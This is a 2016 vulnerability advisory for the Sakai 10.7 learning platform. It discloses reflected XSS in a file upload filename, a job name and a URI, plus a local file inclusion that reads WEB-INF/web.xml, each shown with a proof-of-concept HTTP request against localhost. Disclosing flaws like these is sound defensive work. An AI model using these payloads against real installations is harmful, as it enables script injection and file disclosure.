Sakai 10.7 Cross Site Scripting / Local File Inclusion
Posted on 22 August 2016
i>>? Sakai 10.7 Multiple Vulnerabilities Vendor: Apereo Foundation Product web page: https://www.sakaiproject.org Affected version: 10.7 (Kernel 10.7) Summary: Sakai is a free, community source, educational software platform designed to support teaching, research and collaboration. Systems of this type are also known as Course Management Systems (CMS), Learning Management Systems (LMS), or Virtual Learning Environments (VLE). Desc: Sakai suffers from multiple reflected cross-site scripting vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Also there is a file disclosure vulnerability when calling custom tool script. It is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5358 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5358.php Vendor: https://jira.sakaiproject.org/browse/SAK-26334 (XSS file upload filename param) https://jira.sakaiproject.org/browse/SAK-31523 (XSS when creating job) https://jira.sakaiproject.org/browse/SAK-31524 (XSS in URI) https://jira.sakaiproject.org/browse/SAK-31525 (LFI when calling tools) 29.06.2016 -- XSS when using file upload (filename parameter): ------------------------------------------------ POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1 Host: localhost:8080 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryViazQNB5ok9E64l2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: http://localhost:8080/library/editor/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Connection: close ------WebKitFormBoundaryViazQNB5ok9E64l2 Content-Disposition: form-data; name="NewFile"; filename="test.jsp'-alert(1)-'foo" Content-Type: application/octet-stream testingus ------WebKitFormBoundaryViazQNB5ok9E64l2-- Response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 X-UA-Compatible: IE=EmulateIE11 Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Content-Length: 383 Date: Wed, 29 Jun 2016 11:45:49 GMT Connection: close <script type="text/javascript"> (function(){ var d = document.domain ; while ( true ) { try { var test = parent.document.domain ; break ; } catch( e ) {} d = d.replace( /.*?(?:.|$)/, '' ) ; if ( d.length == 0 ) break ; try { document.domain = d ; } catch (e) { break ; }}})() ; window.parent.OnUploadCompleted(201,'','test.jsp'-alert(1)-'foo',''); </script> XSS when creating a job (After creating a job, click on "Triggers" link): ------------------------------------------------------------------------- GET /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A_id10=Data+Warehouse+Update&_id2:_id14=Post&com.sun.faces.VIEW=&_id2=_id2 HTTP/1.1 Host: localhost:8080 XSS in URI: ----------- GET /access/basiclti/site/~admin/axxm4j<img src=a onerror=alert(3)> HTTP/1.1 Host: localhost:8080 LFI when calling custom tool (Affects Apache Wicket tools like Profile2 and Statistics. Adding "../" is not needed to reproduce the issue. It can be reproduced just by visiting: /portal/tool/[TOOL_ID]/WEB-INF/web.xml): ---------------------------------------- GET /portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml HTTP/1.1 Host: localhost:8080